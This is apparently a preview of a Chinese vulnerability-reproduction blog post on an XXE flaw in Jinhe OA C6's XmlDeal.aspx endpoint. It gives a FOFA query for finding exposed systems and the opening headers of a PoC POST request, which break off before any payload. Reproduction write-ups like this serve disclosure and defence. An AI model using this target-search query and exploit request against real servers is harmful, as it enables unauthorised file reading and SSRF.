金和OA C6 XmlDeal.aspx XXE漏洞复现

  • 开发
  • 14

0x01 产品简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。

0x02 漏洞概述

金和OA C6 XmlDeal.aspx 接口处存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。

0x03 复现环境

FOFA:app="金和网络-金和OA"

0x04 漏洞复现

PoC

POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=
阅读全部

相关推荐

  5. 漏洞OA XmlDeal.aspx XXE漏洞

    2024-04-01 06:48:04       14 阅读

  6. OA C6/Control/GetSqlData.aspx/.ashx SQL 注入漏洞

    2024-04-01 06:48:04       33 阅读

  7. OA jc6 clobfield SQL注入漏洞

    2024-04-01 06:48:04       94 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-04-01 06:48:04       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-01 06:48:04       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-01 06:48:04       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-01 06:48:04       20 阅读

热门阅读

  2. 【软考---系统架构设计师】物联网和云计算

    2024-04-01 06:48:04       19 阅读

  5. typedef两种使用

    2024-04-01 06:48:04       12 阅读

  7. 高级排序算法:归并排序(优化版)

    2024-04-01 06:48:04       14 阅读

  9. 【模拟题,多个变量不用结构体型】

    2024-04-01 06:48:04       14 阅读

  13. rust实现循环队列

    2024-04-01 06:48:04       20 阅读

  14. 如何调整Node内存限制

    2024-04-01 06:48:04       16 阅读

  17. 天星金融(原小米金融)聚焦金融知识普及和反诈宣传,践行金融为民

    2024-04-01 06:48:04       16 阅读

  21. OpenJudge - 16:忽略大小写的字符串比较

    2024-04-01 06:48:04       17 阅读

  24. pytorch-分类-检测-分割的dataset和dataloader创建

    2024-04-01 06:48:04       18 阅读

  27. JVM堆栈详解

    2024-04-01 06:48:04       15 阅读

  29. 20240323-2-决策树面试题DecisionTree

    2024-04-01 06:48:04       14 阅读

  30. ubuntu22.04忘记用户密码

    2024-04-01 06:48:04       16 阅读